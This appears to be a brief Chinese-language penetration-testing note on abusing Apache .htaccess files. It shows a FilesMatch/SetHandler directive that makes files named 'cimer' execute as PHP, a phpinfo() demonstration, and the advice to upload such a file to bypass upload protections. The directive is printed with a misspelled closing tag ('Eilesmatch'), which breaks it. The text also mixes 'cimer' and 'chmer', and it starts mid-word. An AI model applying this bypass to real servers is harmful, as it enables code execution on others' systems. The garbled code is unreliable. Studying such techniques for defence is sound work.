taccess文件(或者"分布式配置文件"), 全称是Hypertext Access(超文本入口), 是Apache服务器中的一个配置文件, 负责相关目录下的网页配置, 了针对目录改变配置的方法, 即在一个特定的文档目录中放置一个包含一个或多个指令的文件, 作用于此目录及其所有子目录, 通过.htaccess文件可以实现网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能
原理
<FilesMatch "cimer">
Sethandler application/x-httpd-php
</Eilesmatch >
通过.htaccess文件, 调用php的解析器解析一个包含‘chmer‘这个字符串的任意文件
案例
-
创建.htaccess文件
<FilesMatch "cimer"> Sethandler application/x-httpd-php </Eilesmatch >
-
创建cimer.html文件
<?php phpinfo(); ?>
-
直接访问 http://127.0.0.1/cimer.html ,就会出现phpinfo的界面
利用
- 通过上传 .htaccess 文件, 直接修改解析规则
- 绕过文件上传漏洞防护